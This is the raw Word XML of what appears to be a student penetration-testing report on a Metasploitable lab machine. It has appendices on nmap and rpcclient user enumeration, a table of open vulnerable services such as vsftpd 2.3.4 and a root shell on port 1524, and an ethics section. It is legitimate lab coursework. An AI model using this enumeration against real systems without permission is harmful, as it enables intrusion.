            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1540510</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5730875" cy="3987800"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="1221400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00614" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated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0" b="1105"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="398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19AA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="121FEC24" wp14:editId="499BD701">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-1270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-211</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5730899" cy="1563581"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2974928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92873" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated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25"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5730899" cy="156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AE2D6E" w14:textId="43298C29" w:rsidR="00DD3EE6" w:rsidRPr="00FA5B3B" w:rsidRDefault="00DD3EE6" w:rsidP="00DD3EE6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix 2: </w:t>
      </w:r>
      <w:r w:rsidR="0009380A" w:rsidRPr="00FA5B3B">
        <w:t>scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BBF59A" w14:textId="524404E3" w:rsidR="005279C5" w:rsidRPr="00FA5B3B" w:rsidRDefault="0074131A" w:rsidP="0009380A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6039AC50" wp14:editId="552DE435">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-350520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>239395</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3489960" cy="5991860"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="806185370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85370" name="Picture 4" descr="A screenshot of a computer screen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43D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0347A00E" wp14:editId="3C1D18C1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3124200</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>259715</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3279775" cy="5097780"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="3215277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27759" name="Picture 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47E0" w:rsidRPr="00FA5B3B">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003A47E0" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> user enumeration</w:t>
      </w:r>
      <w:r w:rsidR="0009380A" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> (2 images)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19801D87" w14:textId="0755768D" w:rsidR="00E853E0" w:rsidRPr="00FA5B3B" w:rsidRDefault="0074131A" w:rsidP="00E853E0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5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F6A6AD2" wp14:editId="51260BD7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>6290310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3735070" cy="1836420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="2147038168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38168" name="Picture 6" descr="A screen shot of a computer program&#10;&#10;Description automatically generated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3"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="373507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853E0" w:rsidRPr="00FA5B3B">
        <w:t>rpcclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E853E0" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> user enumeration</w:t>
      </w:r>
      <w:r w:rsidR="0009380A" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> (2 images)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731794CA" w14:textId="09B3C9D8" w:rsidR="00EC543D" w:rsidRPr="00FA5B3B" w:rsidRDefault="00EC543D" w:rsidP="00EC543D"/>
    <w:p w14:paraId="687BD266" w14:textId="2832DE21" w:rsidR="0031349F" w:rsidRPr="00FA5B3B" w:rsidRDefault="0031349F" w:rsidP="0031349F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B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45F8CE0" wp14:editId="28B729AA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>419100</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3735070" cy="4351020"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="562765968" name="Picture 56276596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38168" name="Picture 6" descr="A screen shot of a computer program&#10;&#10;Description automatically generated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0" b="611"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3735070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FA5B3B">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00B32FAA" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> (3 images)</w:t>
      </w:r>
      <w:r w:rsidR="00A82D53" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82D53" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02970C7E" wp14:editId="48F1D191">
            <wp:extent cx="5731510" cy="3954145"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1180337962" name="Picture 3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7962" name="Picture 30" descr="A screen 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D3CC" w14:textId="6A9AF313" w:rsidR="00A82D53" w:rsidRPr="00FA5B3B" w:rsidRDefault="00A82D53" w:rsidP="00A82D53">
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10222996" wp14:editId="65D3E10D">
            <wp:extent cx="5731510" cy="3629025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="21292655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65507" name="Picture 212926550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B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C85B379" wp14:editId="6215018B">
            <wp:extent cx="5731510" cy="3377565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2886504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50429" name="Picture 28865042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DE29" w14:textId="00C7B7C3" w:rsidR="00D43C71" w:rsidRPr="00FA5B3B" w:rsidRDefault="00D43C71" w:rsidP="00D43C71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve">Appendix 3: </w:t>
      </w:r>
      <w:r w:rsidR="005279C5" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve">gaining </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005279C5" w:rsidRPr="00FA5B3B">
        <w:t>access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18B80C96" w14:textId="77408EAA" w:rsidR="00287186" w:rsidRPr="00FA5B3B" w:rsidRDefault="004D0852" w:rsidP="00EA274E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t>Service table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2"/>
        <w:gridCol w:w="2669"/>
        <w:gridCol w:w="1204"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AB6178" w:rsidRPr="00FA5B3B" w14:paraId="393CFF14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8A85F03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b/>
                <w:bCs/>
                <w:color w:val="4D5053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Service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3E51A119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b/>
                <w:bCs/>
                <w:color w:val="4D5053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Port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C9E1FF6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b/>
                <w:bCs/>
                <w:color w:val="4D5053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Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AB6178" w:rsidRPr="00FA5B3B" w14:paraId="6BC455B2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74126C84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Vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 2.3.4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1DA0462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23E6E3F8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7CD4E4AD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66186BC6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SSH 4.7p1 Debian 8ubuntu 1 (protocol 2.0)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1EB6A2A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4F54A1ED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61DEFA9A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E55AA0D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Linux </w:t>
            </w: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telnetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 service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769691A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71F1BCA5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188BF749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4240DF1B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lastRenderedPageBreak/>
              <w:t xml:space="preserve">Postfix </w:t>
            </w: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smtpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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4DBBDDA2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3B326CFD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698749C0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4C9A6909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ISC BIND 9.4.2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ABC5CFA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53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747D371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669F2D05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6253155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Apache httpd 2.2.8 Ubuntu DAV/2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BE2308A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F6D13D9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242F9BB9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38EF3B5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RPCbind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 service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1E2826E5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111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568E541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1867621D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175C905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Samba </w:t>
            </w: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smbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 3.X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2EADA33A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139 &amp; 445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65BBCD0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6CE9D012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12BB140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3 r services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143BBF5E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512, 513 &amp; 514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32927D4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60B57502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60E03D7F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GNU </w:t>
            </w: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Classpath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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grmiregistry</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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15A40DD3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1099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1B32594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42B9C087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2C56AA31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Metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 root shell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13CBD2D3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1524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D63A4E6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7F692F7A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6B1BE4FD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A NFS service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282CB7F8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2048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69A7AE3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1DC154AD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14F536F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ProFTPD</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 1.3.1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B408364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2121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4FD8AC4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72498D63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1CDA31AA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MySQL 5.0.51a-3ubuntu5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79AFFECD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3306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6FCEF994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26A492FE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AC1FB17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PostgreSQL DB 8.3.0 – 8.3.7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4ECA5907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5432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43C639CF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7DB569B1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12A7D71E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VNC protocol v1.3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4BF46041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5900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791D8CF4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626C77A3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33A4B1A6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X11 service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503FFB01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6000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418D3D10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56FC11B5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76368679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Unreal </w:t>
            </w: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ircd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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24D1BD21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6667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1D51677E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388E4800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1F402ACB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Apache </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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Jserv</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> protocol 1.3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7BB65FA5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8009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1E803C19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  <w:tr w:rsidR="00AB6178" w:rsidRPr="00FA5B3B" w14:paraId="4C2AEAF0" w14:textId="77777777" w:rsidTr="00C52F98">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="64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456CF553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Apache Tomcat/Coyote JSP engine 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="26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000C5C61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8180</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="120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bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7540A5F0" w14:textId="77777777" w:rsidR="00AB6178" w:rsidRPr="00520F36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</w:pPr>
            <w:r w:rsidRPr="00520F36">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="4D5053"/>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23F9DEE4" w14:textId="07585775" w:rsidR="00222147" w:rsidRPr="00FA5B3B" w:rsidRDefault="00C52F98" w:rsidP="00222147">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA5B3B">
        <w:t>ethic</w:t>
      </w:r>
      <w:r w:rsidR="00401FF8" w:rsidRPr="00FA5B3B">
        <w:t>al dilemma</w:t>
      </w:r>
      <w:r w:rsidR="00AC5833" w:rsidRPr="00FA5B3B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2035218265"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00E74DD1" w:rsidRPr="00FA5B3B">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00E74DD1" w:rsidRPr="00FA5B3B">
            <w:instrText xml:space="preserve"> CITATION Sha15 \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00E74DD1" w:rsidRPr="00FA5B3B">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00830949" w:rsidRPr="00FA5B3B">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>(Faily, et al., 2015)</w:t>
          </w:r>
          <w:r w:rsidR="00E74DD1" w:rsidRPr="00FA5B3B">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="538A2D01" w14:textId="2BDED53B" w:rsidR="00222147" w:rsidRPr="00FA5B3B" w:rsidRDefault="00222147" w:rsidP="00222147">
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EA71592" wp14:editId="7E796814">
            <wp:extent cx="5731510" cy="2531110"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="1008404704" name="Picture 1" descr="A black and white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04704" name="Picture 1" descr="A black and white table with white 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7EAE" w14:textId="34A0C3D8" w:rsidR="00401FF8" w:rsidRPr="00FA5B3B" w:rsidRDefault="00401FF8" w:rsidP="00401FF8"/>
    <w:sectPr w:rsidR="00401FF8" w:rsidRPr="00FA5B3B" w:rsidSect="00DC400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E304" w14:textId="77777777" w:rsidR="00011113" w:rsidRDefault="00011113" w:rsidP="00CA73F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0339B6BE" w14:textId="77777777" w:rsidR="00011113" w:rsidRDefault="00011113" w:rsidP="00CA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CBD2" w14:textId="77777777" w:rsidR="00011113" w:rsidRDefault="00011113" w:rsidP="00CA73F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="79F7BEE2" w14:textId="77777777" w:rsidR="00011113" w:rsidRDefault="00011113" w:rsidP="00CA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42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7DFC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D28"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D62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4FB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ABC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17AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D61A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1973"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="014E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62BB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E8E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10"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8E02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82E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3410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3177"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD90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C2AC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AECA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C2D6E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0B6E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5693"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C346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10842"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D846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470CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C7F4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7643C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="179A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396B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E068A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0605373">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1034504078">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1581403554">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1042905062">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="473378925">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1458570945">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="2008050449">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="896165183">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1581061335">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="2035228992">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="113182898">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1389259191">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="387001499">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="58477925">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1045132854">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1630552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05"/>
    <w:rsid w:val="00001D3E"/>
    <w:rsid w:val="00003098"/>
    <w:rsid w:val="00011113"/>
    <w:rsid w:val="00012328"/>
    <w:rsid w:val="00014D6C"/>
    <w:rsid w:val="00016F64"/>
    <w:rsid w:val="00021218"/>
    <w:rsid w:val="000219E5"/>
    <w:rsid w:val="00025929"/>
    <w:rsid w:val="00025BE5"/>
    <w:rsid w:val="00026254"/>
    <w:rsid w:val="000273D8"/>
    <w:rsid w:val="00035545"/>
    <w:rsid w:val="00054FCA"/>
    <w:rsid w:val="00055180"/>
    <w:rsid w:val="00057AF5"/>
    <w:rsid w:val="000612FF"/>
    <w:rsid w:val="00062BFB"/>
    <w:rsid w:val="00066B3F"/>
    <w:rsid w:val="000711EE"/>
    <w:rsid w:val="00074902"/>
    <w:rsid w:val="00074FE2"/>
    <w:rsid w:val="000764A6"/>
    <w:rsid w:val="00077F3A"/>
    <w:rsid w:val="00081E66"/>
    <w:rsid w:val="00082F8D"/>
    <w:rsid w:val="00086517"/>
    <w:rsid w:val="000937CF"/>
    <w:rsid w:val="0009380A"/>
    <w:rsid w:val="000961C5"/>
    <w:rsid w:val="000A0E07"/>
    <w:rsid w:val="000A1882"/>
    <w:rsid w:val="000A262A"/>
    <w:rsid w:val="000B0242"/>
    <w:rsid w:val="000B15C9"/>
    <w:rsid w:val="000B4073"/>
    <w:rsid w:val="000C0CD9"/>
    <w:rsid w:val="000C22B5"/>
    <w:rsid w:val="000C26EE"/>
    <w:rsid w:val="000C600E"/>
    <w:rsid w:val="000C7E1A"/>
    <w:rsid w:val="000D266B"/>
    <w:rsid w:val="000D40EE"/>
    <w:rsid w:val="000D7B89"/>
    <w:rsid w:val="000E06EF"/>
    <w:rsid w:val="000E0FDC"/>
    <w:rsid w:val="000F28CD"/>
    <w:rsid w:val="00100374"/>
    <w:rsid w:val="00104DFB"/>
    <w:rsid w:val="001063D9"/>
    <w:rsid w:val="00110124"/>
    <w:rsid w:val="00113AA9"/>
    <w:rsid w:val="00114D85"/>
    <w:rsid w:val="001201C0"/>
    <w:rsid w:val="00123809"/>
    <w:rsid w:val="0012699E"/>
    <w:rsid w:val="00131002"/>
    <w:rsid w:val="00135140"/>
    <w:rsid w:val="00144B05"/>
    <w:rsid w:val="00151C2F"/>
    <w:rsid w:val="00154617"/>
    <w:rsid w:val="00156941"/>
    <w:rsid w:val="0016654F"/>
    <w:rsid w:val="0017054D"/>
    <w:rsid w:val="00171325"/>
    <w:rsid w:val="00177913"/>
    <w:rsid w:val="00184DF4"/>
    <w:rsid w:val="00185C0F"/>
    <w:rsid w:val="001872B7"/>
    <w:rsid w:val="0019008D"/>
    <w:rsid w:val="001920B9"/>
    <w:rsid w:val="001A2FE0"/>
    <w:rsid w:val="001A4B1A"/>
    <w:rsid w:val="001B2F86"/>
    <w:rsid w:val="001B3F96"/>
    <w:rsid w:val="001B5CE3"/>
    <w:rsid w:val="001C2D17"/>
    <w:rsid w:val="001C4008"/>
    <w:rsid w:val="001C4622"/>
    <w:rsid w:val="001D5B25"/>
    <w:rsid w:val="001D6DCF"/>
    <w:rsid w:val="001D75F5"/>
    <w:rsid w:val="001E2173"/>
    <w:rsid w:val="001E3DFE"/>
    <w:rsid w:val="001E488E"/>
    <w:rsid w:val="001E4EA3"/>
    <w:rsid w:val="001E5615"/>
    <w:rsid w:val="001E6F9E"/>
    <w:rsid w:val="001F34BB"/>
    <w:rsid w:val="001F5FD3"/>
    <w:rsid w:val="00207505"/>
    <w:rsid w:val="0020772E"/>
    <w:rsid w:val="00210074"/>
    <w:rsid w:val="002127EA"/>
    <w:rsid w:val="002147C5"/>
    <w:rsid w:val="00215697"/>
    <w:rsid w:val="00217E00"/>
    <w:rsid w:val="00222147"/>
    <w:rsid w:val="00222A8F"/>
    <w:rsid w:val="0023261A"/>
    <w:rsid w:val="00234765"/>
    <w:rsid w:val="00237A68"/>
    <w:rsid w:val="002406C2"/>
    <w:rsid w:val="0024130B"/>
    <w:rsid w:val="00245200"/>
    <w:rsid w:val="0025473C"/>
    <w:rsid w:val="00255CFE"/>
    <w:rsid w:val="00257373"/>
    <w:rsid w:val="00260463"/>
    <w:rsid w:val="002609FF"/>
    <w:rsid w:val="00263B61"/>
    <w:rsid w:val="0026505F"/>
    <w:rsid w:val="0027079F"/>
    <w:rsid w:val="00274AA4"/>
    <w:rsid w:val="00277D39"/>
    <w:rsid w:val="002834F8"/>
    <w:rsid w:val="0028439B"/>
    <w:rsid w:val="00285F7B"/>
    <w:rsid w:val="00287186"/>
    <w:rsid w:val="00290139"/>
    <w:rsid w:val="00293177"/>
    <w:rsid w:val="0029772E"/>
    <w:rsid w:val="002A4C59"/>
    <w:rsid w:val="002A53DB"/>
    <w:rsid w:val="002B2FBA"/>
    <w:rsid w:val="002B52DD"/>
    <w:rsid w:val="002B7BB0"/>
    <w:rsid w:val="002C0558"/>
    <w:rsid w:val="002C0B4C"/>
    <w:rsid w:val="002C6897"/>
    <w:rsid w:val="002D2DBB"/>
    <w:rsid w:val="002D568A"/>
    <w:rsid w:val="002E11D8"/>
    <w:rsid w:val="002E1B9E"/>
    <w:rsid w:val="002E2747"/>
    <w:rsid w:val="002E57FD"/>
    <w:rsid w:val="002E5A74"/>
    <w:rsid w:val="002E6C82"/>
    <w:rsid w:val="002E77BC"/>
    <w:rsid w:val="002F1490"/>
    <w:rsid w:val="002F1766"/>
    <w:rsid w:val="002F2C45"/>
    <w:rsid w:val="002F5302"/>
    <w:rsid w:val="00310292"/>
    <w:rsid w:val="00311217"/>
    <w:rsid w:val="0031349F"/>
    <w:rsid w:val="003147FC"/>
    <w:rsid w:val="003153AF"/>
    <w:rsid w:val="00317E98"/>
    <w:rsid w:val="00320013"/>
    <w:rsid w:val="00320BF3"/>
    <w:rsid w:val="003213CC"/>
    <w:rsid w:val="00326BE9"/>
    <w:rsid w:val="00331770"/>
    <w:rsid w:val="003359FA"/>
    <w:rsid w:val="00337C82"/>
    <w:rsid w:val="00341C66"/>
    <w:rsid w:val="003420E9"/>
    <w:rsid w:val="00343F13"/>
    <w:rsid w:val="00345D06"/>
    <w:rsid w:val="00347E38"/>
    <w:rsid w:val="00353385"/>
    <w:rsid w:val="00360330"/>
    <w:rsid w:val="003608B7"/>
    <w:rsid w:val="00363F61"/>
    <w:rsid w:val="00367656"/>
    <w:rsid w:val="00371F27"/>
    <w:rsid w:val="00374D78"/>
    <w:rsid w:val="003814F7"/>
    <w:rsid w:val="003901F3"/>
    <w:rsid w:val="00390B6D"/>
    <w:rsid w:val="003932D1"/>
    <w:rsid w:val="00395A13"/>
    <w:rsid w:val="00395FFE"/>
    <w:rsid w:val="003A3F27"/>
    <w:rsid w:val="003A47E0"/>
    <w:rsid w:val="003B1E37"/>
    <w:rsid w:val="003C0156"/>
    <w:rsid w:val="003C2802"/>
    <w:rsid w:val="003C42BE"/>
    <w:rsid w:val="003D2504"/>
    <w:rsid w:val="003D2818"/>
    <w:rsid w:val="003D3C0A"/>
    <w:rsid w:val="003D4C64"/>
    <w:rsid w:val="003D6CE6"/>
    <w:rsid w:val="003E38A2"/>
    <w:rsid w:val="003F2111"/>
    <w:rsid w:val="003F468F"/>
    <w:rsid w:val="003F54B9"/>
    <w:rsid w:val="003F5975"/>
    <w:rsid w:val="003F7C99"/>
    <w:rsid w:val="0040163D"/>
    <w:rsid w:val="00401A56"/>
    <w:rsid w:val="00401FF8"/>
    <w:rsid w:val="0040281F"/>
    <w:rsid w:val="00412E70"/>
    <w:rsid w:val="00413F8A"/>
    <w:rsid w:val="00417DB7"/>
    <w:rsid w:val="00420FE0"/>
    <w:rsid w:val="00421C12"/>
    <w:rsid w:val="00424E43"/>
    <w:rsid w:val="0043536C"/>
    <w:rsid w:val="00435DF0"/>
    <w:rsid w:val="004376E8"/>
    <w:rsid w:val="00443922"/>
    <w:rsid w:val="00453B49"/>
    <w:rsid w:val="00456A94"/>
    <w:rsid w:val="00456F52"/>
    <w:rsid w:val="004572DD"/>
    <w:rsid w:val="00462F34"/>
    <w:rsid w:val="00470378"/>
    <w:rsid w:val="004801F0"/>
    <w:rsid w:val="004843DE"/>
    <w:rsid w:val="00484F15"/>
    <w:rsid w:val="00487D6A"/>
    <w:rsid w:val="00491930"/>
    <w:rsid w:val="00497608"/>
    <w:rsid w:val="004A011F"/>
    <w:rsid w:val="004A03C3"/>
    <w:rsid w:val="004A241D"/>
    <w:rsid w:val="004A3DEC"/>
